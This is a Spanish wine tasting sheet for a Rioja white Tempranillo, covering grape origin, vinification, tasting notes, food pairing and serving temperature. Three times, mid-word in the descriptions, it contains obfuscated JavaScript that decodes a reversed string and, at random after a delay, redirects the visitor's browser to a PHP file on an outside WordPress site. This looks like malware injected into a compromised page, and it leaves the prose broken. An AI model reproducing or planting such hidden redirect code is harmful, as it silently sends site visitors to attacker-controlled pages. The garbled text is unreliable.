ARABARTE RIOJA

ROYAL MOON TEMPRANILLO BLANCO


NOTAS DE CATA


VARIEDAD DE UVA

100% Tempranillo Blanco procedente de viñedos jóvenes, de este mismo siglo XXI, ya que esta olvidada variedad la hemos recuperado muy recientemente, complement$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando así nuestro Tempranillo Negro, variedad autóctona por excelencia.

 

VINIFICACIÓN

Vendimia manual; selección rigurosa recogiendo los racimos de uva en perfecto estado sanitario y de maduración, descubriendo año tras año nuevas características organolépticas. Elaboración y fermentación en frío, entre 10 y12º c., sobre sus propias lías.

 

NOTA DE CATA

Color limpio, amarillo pálido, brillante y transparente con algún reflejo verdoso; nariz de intensidad alta, franco y marc$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las peculiaridades de un nuevo varietal, combin$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando aromas de fruta blanca (pera-reineta) y cítricos con notas florales de fondo. Entrada en boca aterciopelada, ligeramente abocada a panadería pero muy fresca, de acidez equilibrada y muy bien integrada, final largo y agradable con retrogusto plenamente varietal con un potencial que veremos en los próximos años.

 

MARIDAJE

Caviar, mariscos, pates y foie-grases, quesos cremosos…

 

TEMPERATURA DE CONSUMO

Entre 6 y 10ª

 

GRADO ALCOHÓLICO

12,5% Vol.